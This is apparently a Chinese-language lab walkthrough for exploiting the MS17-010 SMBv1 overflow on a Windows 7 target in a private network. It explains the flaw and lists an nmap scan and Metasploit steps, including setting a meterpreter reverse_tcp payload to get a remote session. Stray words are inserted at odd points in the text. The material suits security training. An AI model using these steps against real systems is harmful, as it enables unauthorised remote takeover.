MS17-010遠程溢出(CVE-2017-0143)

MS17-010遠程溢出(CVE-2017-0143)

原理:MS17-010漏洞出如今Windows SMB v1中的內核態函數srv!SrvOs2FeaListToNt在處理FEA(File Extended Attributes)轉換時,在大非分頁池(Large Non-Paged Kernel Pool)上存在緩衝區溢出。函數srv!SrvOs2FeaListToNt在將FEA list轉換成NTFEA(Windows NT FEA) list前會調用srv!SrvOs2FeaListSizeToNt去計算轉換後的FEA lsit的大小,因計算大小錯誤,而致使緩衝區溢出。linux

實驗環境shell

功能 屬性
操做機 kali linux
IP 192.168.0.3
靶機 Windows7 SP1
IP 192.168.0.2

1.端口探測

nmap -sV -Pn 192.168.0.2

目標機開放了135 139 445 3389等端口

2.漏洞掃描

在終端輸入msfconsole開啓msf
搜索ms17-010漏洞相關模塊
使用use命令選擇咱們要使用的掃描模塊

能夠看到目標主機存在ms17-010漏洞,開始使用漏洞利用模塊windows

選擇載荷payload,也就是shellcode,此處咱們選擇回連至控制端shell的payload
set payload  windows/x64/meterpreter/reverse_tcp

設置本地主機

完成配置後,運行exploit或者run開始執行漏洞利用模塊tcp

成功獲取來自目標主機的Session會話函數

4.遠程登陸目標機

相關文章
相關標籤/搜索